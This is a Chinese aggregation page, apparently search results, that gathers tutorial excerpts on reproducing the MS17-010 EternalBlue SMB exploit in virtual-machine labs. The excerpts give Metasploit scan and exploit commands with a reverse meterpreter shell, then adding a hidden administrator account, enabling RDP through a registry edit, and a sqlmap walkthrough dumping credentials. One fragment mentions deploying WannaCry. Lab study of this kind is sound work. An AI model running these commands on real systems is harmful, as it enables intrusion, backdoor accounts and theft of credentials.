精华内容
下载资源
问答
  • MS17-010漏洞复现
    2019-07-23 11:02:18

    实验环境:
    kali (虚拟机)
    Windows 7 x64(虚拟机)

    1、查看两台机器的IP地址,且关闭win7防火墙
    在这里插入图片描述
    在这里插入图片描述
    可见win7 IP为: 192.168.15.129
    kali 为:192.168.15.130

    2、使用mdfconsole
    在此之前需要进行端口扫描,需要确保win7的445端口开放,知道自己的没有关闭此端口,所以在这不进行端口确认了,像验证的可以利用nmap进行扫描,具体指令百度康康。

    启动 mdfconsole:
    -msfconsole

    使用如下命令:

    • use auxiliary/scanner/smb/smb_ms17_010
    • show targets
    • show options

    第一句为利用auxiliary/scanner/smb/smb_ms17_010进漏洞分析,看看这个445端口是否能被入侵。
    先使用show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认已经写好了大部分的参数,但还是需要手动设置一下RHOSTS的参数,即攻击的主机ip,这里我们写被攻击的win7的 ip。
    在这里插入图片描述
    设置RHOSTS 为win7的地址,之后执行run。看到结果绿色加号那行,主机可能存在MS17-010漏洞。确认可以通过MS17-010漏洞入侵。
    在这里插入图片描述
    使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue,
    用show targets 查看该模块适用的主机系统
    show options 查看选项。
    在这里插入图片描述
    只要设置RHOST为被攻击主机地址即可。
    set RHOST xxx.xxx.xxx.xxx(被攻击主机地址)
    执行run
    在这里插入图片描述
    当结束后,看到C:\Windows\system32> 即渗透成功,可以进行其余有趣的操作。

    更多相关内容
  • ms17漏洞利用

    千次阅读 2022-02-14 11:33:16
    Ms17漏洞利用 首先了解msf的攻击技巧常用语 msfconsole 开启虚拟机msf search ms17 查询可利用的脚本 Run和exploit都是攻击命令 注意192.168.1.4是靶机 192.168.1.7是攻击机 show options 是查看版本payload...

    Ms17漏洞利用

    首先了解msf的攻击技巧常用语

    1. msfconsole  开启虚拟机msf
    2.  search ms17 查询可利用的脚本
    3.   Run和exploit都是攻击命令
    4. 注意192.168.1.4是靶机 192.168.1.7是攻击机
    5. show options 是查看版本payload武器等

    利用nmap扫描查看是否靶机开启445端口

    若开启则利用au工具进行扫描

    use auxiliary/scanner/smb/smb_ms17_010

    set rhosts   192.168.1.4

    set threads  100

    run

    开始攻击

    use exploit/windows/smb/ms17_010_eternalblue

    set rhost 192.168.1.4

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.7

    run

    成功

    Net user 查看信息

    Net user admin 1q! /add 创建新的用户

    Net localgroup Administrators admin /add 赋予权限

    Net getgui -e

    打开一个新标签页面后 run rdesktop

    打开靶机页面进行操作

    Exit 推出

    Mkdir创建目录mkdir tianqing

    和mkdir tian

         Upload上传文件upload 1

    Download 下载文件 download  (文件名)

     Sqlmap 获取flag然后就是

    被攻击机172.16.0.216

    被攻击机windows servesr2008-r

    攻击机192.168.140.134

    将该bp代理所得以文件形式命名为test.txt保存在虚拟机桌面

    接下来sqlmap -r test.txt

    发现数据库版本5.6+

    接下来进入数据库列表

    sqlmap -r test.txt –dbs

    发现有8个数据库

    sqlmap -r test.txt --current-db //查看当前数据库所使用的数据库为csma

    sqlmap -r test.txt -D cmsa –tables

    对该数据库进行表的爆破

    然后根据英文意思我们选择来进行爆破表manage

    sqlmap -r test.txt -D cmsa -T manage --columns  对表的东西进行爆破

    接下来对column中的name和password user爆破

    sqlmap -r test.txt -D cmsa -T manage -C password,name,user –dump

    获取密码然后用字典解析

    展开全文
  • windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
  • MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
  • MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
  • MS17-010(永恒之蓝)漏洞分析与复现

    千次阅读 多人点赞 2021-09-18 23:59:08
    文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块...

    一、漏洞简介

    1、永恒之蓝介绍:

    永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

    2、漏洞原理:

    永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

    3、影响版本:

    目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

    二、漏洞复现

    复现环境:

    • 攻击机:Linux kali(IP:192.168.50.130)

    • 靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

    实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

    复现过程:

    1、主机发现:

    登录 kali linux,用 nmap 探测本网段存活主机

    nmap 192.168.50.0/24
    

    在这里插入图片描述
    可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

    2、使用MSF的永恒之蓝漏洞模块

    打开MSF:msfconsole
    在这里插入图片描述
    MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~( ̄▽ ̄)~

    搜索 ms17-010 代码:search ms17_010
    在这里插入图片描述

    这里可以得到一些工具,其中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

    3、使用ms17-010扫描模块,对靶机进行扫描:

    使用模块:

    use auxiliary/scanner/smb/smb_ms17_010
    

    设置目标IP或网段:

    set rhosts 192.168.50.132
    

    执行扫描:run
    在这里插入图片描述
    如果出现以上情况,就说明存在漏洞。

    4、使用ms17-010攻击模块,对靶机进行攻击

    使用模块:

    use exploit/windows/smb/ms17_010_eternalblue
    

    设置攻击目标IP

    set rhosts 192.168.50.132
    

    可以使用 show options 命令查看设置选项

    在这里插入图片描述
    执行攻击:exploit 或 run
    在这里插入图片描述
    攻击完成!

    5、得到靶机shell

    在这里插入图片描述
    输入:chcp 65001 可解决乱码问题。
    在这里插入图片描述
    解决了,但是没有完全解决。

    6、通过shell对靶机进行控制

    1、创建新用户 ,语法:net user 用户名 密码 /add

    输入:

    net user sss 123456 /add
    

    查看用户信息,命令:net user
    在这里插入图片描述
    可以看到添加成功了。

    2、将用户sss添加至管理员组

    net localgroup administrators sss /add
    

    在这里插入图片描述
    3、开启远程桌面功能

    查看3389端口状态:netstat -ano
    在这里插入图片描述
    看到3389端口并没有开启,开启3389端口,命令:

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    在这里插入图片描述
    3389端口开启。

    4、远程桌面连接靶机

    rdesktop 192.168.50.132:3389
    

    在这里插入图片描述
    使用创建的sss用户进行登录
    在这里插入图片描述
    登陆成功!
    在这里插入图片描述
    上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。

    展开全文
  • MS17-010永恒之蓝漏洞的简谈与利用

    千次阅读 2021-11-12 17:58:15
    MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft ...

    MS17-010是一个安全类型的补丁。

    MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

    于4月14号发出安全公告《Microsoft 安全公告 MS17-010 - 严重》

    以下软件版本都受到影响。未列出的版本表明其支持生命周期已结束或不受影响。若要确定软件版本的支持生命周期,请参阅Microsoft 支持生命周期。

    对每个受影响软件标记的严重等级假设漏洞可能造成的最大影响。若要了解在此安全公告发布 30 天内漏洞被利用的可能性(相对于严重等级和安全影响),请参阅3 月份公告摘要中的利用指数。

    注意如需了解使用安全更新程序信息的新方法,请参阅安全更新程序指南。你可以自定义视图,创建受影响软件电子数据表,并通过 RESTful API 下载数据。如需了解更多信息,请参阅安全更新指南常见问题解答。重要提醒:“安全更新程序指南”将替代安全公告。

    从 2016 年 10 月版开始,Microsoft 已更改 Windows 7、Windows Server 2008 R2、Windows 8.1、Windows Server 2012 和 Windows Server 2012 R2 的更新服务模式。有关详细信息,请参阅此Microsoft TechNet 文章。

    此更新程序仅通过Windows 更新提供。

    Windows 10 和 Windows Server 2016 更新为累积更新。除了非安全更新之外,每月安全发布还包括用于影响 Windows 10 的漏洞的所有安全修补程序。可以通过Microsoft 更新目录获取这些更新程序。请注意,从 2016 年 12 月 13 日起,Windows 10 和 Windows Server 2016 累积更新详情将在发行说明中归档。请参阅发行说明,了解操作系统内部版本号、已知问题和受影响文件列表信息。

    *“替代的更新程序”列仅显示一系列被取代的更新程序中最新的更新程序。有关替代的更新程序的完整列表,请转到Microsoft 更新目录,搜索更新程序知识库文章编号,然后查看更新程序详细信息(替代的更新程序信息位于“程序包详细信息”选项卡中)。

    多个 Windows SMB 远程执行代码漏洞

    当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

    为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。

    此安全更新通过更正 SMBv1 处理这些经特殊设计的请求的方式来修复漏洞。

    下表包含指向“常见漏洞和披露”列表中每个漏洞标准入口的链接:

    缓解因素

    Microsoft 并未发现这些漏洞的任何缓解因素。

    缓解因素

    Microsoft 并未发现此漏洞的任何缓解因素。

    变通办法

    以下变通办法在您遇到的情形中可能会有所帮助:

    禁用 SMBv1对于运行 Windows Vista 及更高版本的客户请参阅Microsoft 知识库文章 2696547适用于运行 Windows 8.1 或 Windows Server 2012 R2 及更高版本的客户的替代方法对于客户端操作系统:对于服务器操作系统:变通办法的影响。目标系统上将禁用 SMBv1 协议。如何撤消变通办法。回溯变通办法步骤,而不是将“SMB 1.0/CIFS 文件共享支持”功能还原为活动状态。

    1、打开“服务器管理器”,单击“管理”菜单,然后选择“删除角色和功能”。

    2、在“功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击“确定”以关闭此窗口。

    3、重启系统。

    4、打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。

    5、在“Windows 功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击“确定”以关闭此窗口。

    6、重启系统。

    我们讲解了一下MS17-010,接下来我们来简谈一下永恒之蓝是什么

            永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

     

     好了,我们刚刚也讲了这么多了,现在就拿靶机进行一次漏洞利用吧!

    设置好windows7的ip地址与kalilinux的ip地址保持一致即可

     我们还是先打开kalilinux的msf渗透测试框架进行搜索关于MS17-010的漏洞模块

     

     我们开始搜索相关漏洞的利用模块

    我们先使用auxiliary模块进行检测是否存在永恒之蓝漏洞

     

      英语不是很好的师傅们可以进行翻译一下

     检测结束,他告诉我们存在永恒之蓝漏洞,那么我们就可以来利用一下这个漏洞从而达成渗透系统的效果

     

    然后我们设置一下ip地址

    这里我强调一下,就是说这个永恒之蓝漏洞是只针对445端口的一个利用exp,如果我们不知道他的445端口是否打开的情况下,我们可以先使用nmap

    或者其他端口扫描工具进行探测一下(注意保护好自己!!!)

    我这里就不必掩护自己了,因为我是本地环境测试。

    发现445端口开放状态,我们就可以进行下一步的测试环节了

    设置好靶机ip地址后就可以开跑了

     

    攻击失败,寻找原因.........

    这个攻击失败的原因是因为windows7的防火墙是开启状态,我们将windows7的防火墙关闭掉再次进行测试

    我们打开windows7靶机

    额.........由于刚刚的攻击,给windows7直接打成蓝屏了,我们只好重启win7后进行测试了

    开机后先查看ip地址是否有变化

     修改ip地址后,关闭win7靶机的防火墙再次进行测试

     我们继续进行测试

      成功打入,我们看一下利用exp打入的用户权限是什么

     

     

    打入成功,这次没有出现蓝屏。

    如果你把防火墙的设置设置成下图这两种的话,那么也是无果的

     

     

     

    这个针对的是开启防火墙并且处于公用网络状态下的测试结果

    接下来我们换到家庭网络和工作网络的状态下进行测试

     这是家庭网络状态下,我们可以成功打入win7系统

    我们在切换到工作网络状态下进行测试

     

    发现也是可以直接打入系统的 

     

    本次讲解到此结束,感谢各位师傅的观看。 

     

     

     

     

    展开全文
  • 在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
  • 使用MS17-010漏洞对win7进行渗透(永恒之蓝),ms17-010漏洞存在于未打补丁的win7&winserver2008;
  • NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
  • 永恒之蓝检测工具MS17-010漏洞扫描工具
  • MS17-010 补丁

    2017-05-15 11:17:48
    此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全...
  • 漏洞学习之:MS17-010

    千次阅读 2021-11-15 22:37:50
    MS17-010 漏洞通过向主机的 SMBv1 服务发送恶意命令造成举出,最终导致任意命令执行。在 Windows 系统中 SMB 服务默认是开启的,监听端口默认为 445。影响的系统版本有 Windows NT–WinServer 2012。 利用前提:目标...
  • 查阅了很多网络大牛对这个漏洞的分析和介绍,只对整体进行了一定的理解,具体的源码部分的漏洞原理还是一知半解。后面的复现部分也是我自己电脑上的三台虚拟机实现的。如果有错误希望大牛们能给我提出来,感谢。
  • 我记得这个漏洞在12年的时候,国内的资料还很少,当时遇到之后来回找资料,但是国内当时在网上能看到的资料只有2篇,但我忘记是哪2篇了,不过手上是有2篇比较早的资料,先传上来做个引题吧。然后,在13年,这个漏洞...
  • MS17010漏洞利用姿势

    千次阅读 2021-10-14 13:45:25
    扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open MSF常规漏洞利用 msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 ...
  • MS17-010漏洞分析与复现1 前置知识2 漏洞简介3 漏洞代码简析4 复现5 可能遇到的问题5.1 在Meterpreter中开启vnc后无法控制目标计算机,只能监视。 1 前置知识   SMB(Server Message Block,服务器消息块): 一个...
  • MS17010漏洞利用总结

    千次阅读 2021-08-17 20:58:58
    扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open MSF常规漏洞利用: msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 ...
  • MS17-010 永恒之蓝漏洞利用方式

    千次阅读 2022-03-17 15:43:24
    Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux ...
  • 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网...
  • MS17-010复现步骤

    2020-01-13 10:50:21
    MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft ...
  • ms17_010漏洞利用

    千次阅读 2022-02-16 17:22:03
    MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将...
  • 作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry...所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
  • ms17_010(永恒之蓝)漏洞利用 1、MS17-010是什么 MS17-010漏洞利用模块就是利用Windows系统的Windows SMB远程执行代码漏洞, 向Microsoft服务器消息块(SMBv1)服务器发送经特殊设计的消息后,允许远程代码执行。 ...
  • 漏洞复现之MS17_010

    千次阅读 2021-10-19 15:32:03
    MS17_010漏洞复现与利用 第一步:查找相应的模块,选择自己需要的模块 第二步:使用相应的模块 第三步:查找对应的payload 第四步:设置对应的payload 第五步:显示设置的选项,yes的必须填写,并设置远程的...
  • MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。于2017...
  • 利用ms17-010漏洞提权

    千次阅读 2019-03-27 00:59:23
    一、打开kali和win7查看IP。 (1) Windows7作为靶机 IP:192.168.43.109 (2) Kali作为攻击机(最新版kaili) IP:192.168.43.49 二、打开kali进入终端输入nmap ...四、进入后输人search ms17-010(搜素攻击模块) 五...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 32,423
精华内容 12,969
关键字:

ms17漏洞

友情链接: opepatizg.rar